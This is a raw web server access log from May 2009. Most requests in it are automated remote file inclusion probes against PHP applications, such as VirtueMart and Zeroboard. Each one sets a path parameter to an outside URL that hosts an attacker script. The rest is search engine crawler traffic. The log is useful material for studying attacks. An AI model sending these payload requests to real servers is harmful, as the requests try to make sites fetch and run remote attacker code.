199.120.90.222 - - [14/May/2009:20:06:55 -0500] "GET /logs//?sIncPath=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:20:06:55 -0500] "GET //?sIncPath=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:20:07:02 -0500] "GET /logs//?sIncPath=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:20:07:02 -0500] "GET //?sIncPath=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
87.106.135.14 - - [14/May/2009:20:07:54 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:20:07:55 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
65.55.106.219 - - [14/May/2009:20:13:59 -0500] "GET /logs/access_log.1233360000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.153.212.195 - - [14/May/2009:20:14:50 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:20:14:55 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:20:14:58 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:20:15:10 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:20:15:11 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
122.153.212.195 - - [14/May/2009:20:15:46 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:20:18:00 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.203 - - [14/May/2009:20:18:30 -0500] "GET /logs/access_log.1194048000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
115.145.170.177 - - [14/May/2009:20:19:20 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
115.145.170.177 - - [14/May/2009:20:19:21 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
115.145.170.177 - - [14/May/2009:20:19:39 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
115.145.170.177 - - [14/May/2009:20:19:40 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.55.106.123 - - [14/May/2009:20:19:59 -0500] "GET /logs/access_log.1200441600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
199.120.90.222 - - [14/May/2009:20:20:12 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:20:20:12 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.38.16.54 - - [14/May/2009:20:20:15 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.38.16.54 - - [14/May/2009:20:20:15 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:20:20:24 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:20:20:24 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:20:20:26 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:20:20:26 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
115.145.170.177 - - [14/May/2009:20:20:30 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
115.145.170.177 - - [14/May/2009:20:20:30 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.38.16.54 - - [14/May/2009:20:20:35 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.38.16.54 - - [14/May/2009:20:20:35 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.38.16.54 - - [14/May/2009:20:21:18 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.38.16.54 - - [14/May/2009:20:21:19 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:20:21:55 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:20:21:55 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:20:22:25 -0500] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:20:22:25 -0500] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
65.55.106.243 - - [14/May/2009:20:25:29 -0500] "GET /logs/access_log.1148601600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.214 - - [14/May/2009:20:26:30 -0500] "GET /logs/access_log.1160265600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.80.195.44 - - [14/May/2009:20:34:25 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; (R1 1.5); .NET CLR 1.1.4322)"
212.59.11.66 - - [14/May/2009:20:34:42 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:34:42 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:34:42 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:34:42 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
61.67.196.130 - - [14/May/2009:20:35:23 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.oby.ch/cache/newscan1id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
61.67.196.130 - - [14/May/2009:20:35:23 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.oby.ch/cache/newscan1id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
61.67.196.130 - - [14/May/2009:20:35:31 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.oby.ch/cache/newscan1id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
61.67.196.130 - - [14/May/2009:20:35:32 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.oby.ch/cache/newscan1id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
65.55.106.206 - - [14/May/2009:20:38:00 -0500] "GET /logs/access_log.1210464000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.150.79.146 - - [14/May/2009:20:43:23 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:20:43:23 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:20:43:23 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:20:43:36 -0500] "GET /logs/access_log.1240531200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:20:45:20 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:20:45:20 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:20:45:20 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:20:45:30 -0500] "GET /logs/access_log.1240531200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:20:48:07 -0500] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:20:48:07 -0500] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:20:48:07 -0500] "GET /logs/access_log.1239408000//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:20:53:09 -0500] "GET /logs/access_log.1240531200//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
213.186.113.5 - - [14/May/2009:20:54:41 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:54:42 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
66.249.67.180 - - [14/May/2009:20:55:01 -0500] "GET /logs/access_log.1189900800 HTTP/1.1" 200 6975 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [14/May/2009:20:55:29 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:20:55:30 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:20:55:30 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
213.186.113.5 - - [14/May/2009:20:56:06 -0500] "GET /logs/main.php?x=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:56:06 -0500] "GET /main.php?x=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:56:32 -0500] "GET /logs/avatar.php?page=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:56:32 -0500] "GET /avatar.php?page=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:56:37 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:56:38 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:56:41 -0500] "GET /logs/db.php?path_local=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:56:41 -0500] "GET /db.php?path_local=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 289 "-""libwww-perl/5.79"
121.165.73.157 - - [14/May/2009:20:56:45 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:20:56:45 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:20:56:45 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:57:29 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:57:29 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:57:29 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:57:36 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:58:14 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:58:14 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:58:14 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:58:17 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
213.186.113.5 - - [14/May/2009:20:58:30 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:20:58:30 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
212.59.11.66 - - [14/May/2009:20:59:31 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:20:59:31 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:20:59:43 -0500] "GET /logs/access_log.1132790400 HTTP/1.1" 200 785 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.186.113.5 - - [14/May/2009:21:00:01 -0500] "GET /logs/main.php?pagina=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:21:00:01 -0500] "GET /main.php?pagina=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:21:03:29 -0500] "GET /logs/index2.php?p=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:21:03:30 -0500] "GET /index2.php?p=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.249.67.180 - - [14/May/2009:21:13:48 -0500] "GET /logs/access_log.1196035200 HTTP/1.1" 200 1357 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.143.98.5 - - [14/May/2009:21:15:30 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:15:30 -0500] "GET //?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:15:32 -0500] "GET /logs//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 200 189449 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:15:49 -0500] "GET /logs/access_log.1238025600//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.128.135.52 - - [14/May/2009:21:16:38 -0500] "GET /logs/errors.php?error=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.128.135.52 - - [14/May/2009:21:16:38 -0500] "GET /errors.php?error=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.171.225.234 - - [14/May/2009:21:18:14 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cerigua.org/cp/scripts/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
213.171.225.234 - - [14/May/2009:21:18:15 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.cerigua.org/cp/scripts/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
123.143.98.5 - - [14/May/2009:21:18:15 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:18:15 -0500] "GET //?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:18:17 -0500] "GET /logs//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 200 189449 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:21:19:03 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:21:19:03 -0500] "GET //include/admin.lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:21:19:03 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:21:19:11 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:21:19:51 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:21:19:51 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:21:19:51 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:21:20:22 -0500] "GET /logs/access_log.1239494400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:20:22 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:20:22 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:20:22 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
216.120.237.150 - - [14/May/2009:21:20:44 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
216.120.237.150 - - [14/May/2009:21:20:44 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 334 "-""libwww-perl/5.811"
62.128.135.52 - - [14/May/2009:21:20:48 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
62.128.135.52 - - [14/May/2009:21:20:48 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
65.55.106.209 - - [14/May/2009:21:21:01 -0500] "GET /logs/access_log.1109203200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.108.84.112 - - [14/May/2009:21:21:28 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 334 "-""Mozilla/4.61 (Macintosh; I; PPC)"
